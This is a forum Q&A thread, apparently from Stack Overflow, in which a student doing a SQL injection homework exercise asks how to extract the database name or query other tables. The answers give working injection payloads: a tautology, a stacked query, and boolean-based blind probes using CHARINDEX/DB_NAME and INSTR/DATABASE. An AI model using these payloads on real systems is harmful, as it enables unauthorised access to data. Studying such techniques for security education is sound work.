
I'm doing an exercise on SQL injection, and the query is given. The data comes in between ''. So this is the query:

select * from contacts where name = ''

I managed to see the users in the table using this:

select * from contacts where name = 'anything' or 1='1'

But my question is: how can I write it so that I can run a new query, or see the database name, for example, so that I can check other tables?

EDIT:

To avoid confusion: the query is not given to us; there is a text field on a web page, and that's what we use to do the SQL injection.

So imagine the query is this:

select * from contacts where name = ''

And I wrote this in the text field to see all the users.

anything' or 1='1

I'm trying to understand how I can use this text field to see the name of the database or run other queries.

Thank you.

TurhanG
  • How are you seeing the results? Are you running the query directly in SQL? – clinomaniac Dec 15 '17 at 18:50
  • I'm seeing the results on a web page. Originally I didn't have any idea about the query, but since this is homework it is being shown to us. There is a text field where you insert the name, and I wrote ( anything' or 1='1 ) into the text field to see all the users. @clinomaniac – TurhanG Dec 15 '17 at 19:07
  • What language is the page written in? Look into using parameters. It would look something like select * from contacts where name = ? and then you would pass in the value. – clinomaniac Dec 15 '17 at 19:09
  • @clinomaniac Probably PHP and MySQL. You can check my edit of the post; maybe that will give you a better understanding. – TurhanG Dec 15 '17 at 19:11
  • Are you trying to do SQL Injection and get more information from the database? I thought you were asking about how to write the query to avoid sql injection. – clinomaniac Dec 15 '17 at 19:14

2 Answers


So if the query is:

select * from contacts where name = ''

You can try something like:

'; select * from anotherTableName -- 
clinomaniac

If your data does not return multi-result sets then you can do something like:

In SQL Server

SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=1
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=2
SELECT  * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=3
...

Until you get all the correct indexes of the characters in the name.

In MySQL it would be something like:

SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =1
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =2
SELECT  * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =3
...
Ross Bush